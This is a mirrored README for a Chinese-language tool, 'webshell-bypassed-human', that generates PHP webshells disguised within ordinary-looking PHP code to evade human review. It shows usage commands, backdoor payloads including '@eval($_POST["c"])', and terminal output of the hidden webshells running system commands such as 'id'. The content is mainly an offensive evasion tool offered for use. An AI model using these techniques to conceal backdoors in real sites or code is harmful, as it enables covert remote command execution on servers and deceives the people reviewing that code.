Giter Club home page Giter Club logo

webshell-bypassed-human's Introduction

webshell-bypassed-human

见公众号文章:传送门 ,或者见 fb 文章 https://www.freebuf.com/articles/web/241454.html

过人 webshell 的生成工具

» python hide_webshell.py
usage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE]
                        [--debug]
                        php
hide_webshell.py: error: the following arguments are required: php, -pf/--payload_file

将 payload 放在 -pf 所指定的路径

hide webshell

示例:

python hide_webshell.py hide_webshell.py normal.php -pf payload.txt

hide webshell pro

示例:

python hide_webshell.py normal_pro.php -pf payload.txt --pro

payload 示例

  • system("echo \"hacked by Tr0y :)\"");
  • @eval($_POST["c"]);

完整示例

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:27]
» cat payload.txt
system("echo \"hacked by Tr0y :)\"");%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:28]
» p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php
[+] Hide webshell in normal mode
  [-] Get payload from payload.txt
      Payload is system("echo \"hacked by Tr0y :)\"");
  [-] Get php code from normal.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:31]
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php
[+] Hide webshell in pro mode
  [-] Get payload from payload.txt
      Payload is system("echo \"hacked by Tr0y :)\"");
  [-] Get php code from normal_pro.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:23]
» cat payload.txt
@eval($_POST["c"]);%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:24]
» p hide_webshell.py normal.php -pf payload.txt && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
[+] Hide webshell in normal mode
  [-] Get payload from payload.txt
      Payload is @eval($_POST["c"]);
  [-] Get php code from normal.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:26]
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
[+] Hide webshell in pro mode
  [-] Get payload from payload.txt
      Payload is @eval($_POST["c"]);
  [-] Get php code from normal_pro.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

其他

Stargazers over time

webshell-bypassed-human's People

Contributors

macr0phag3 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.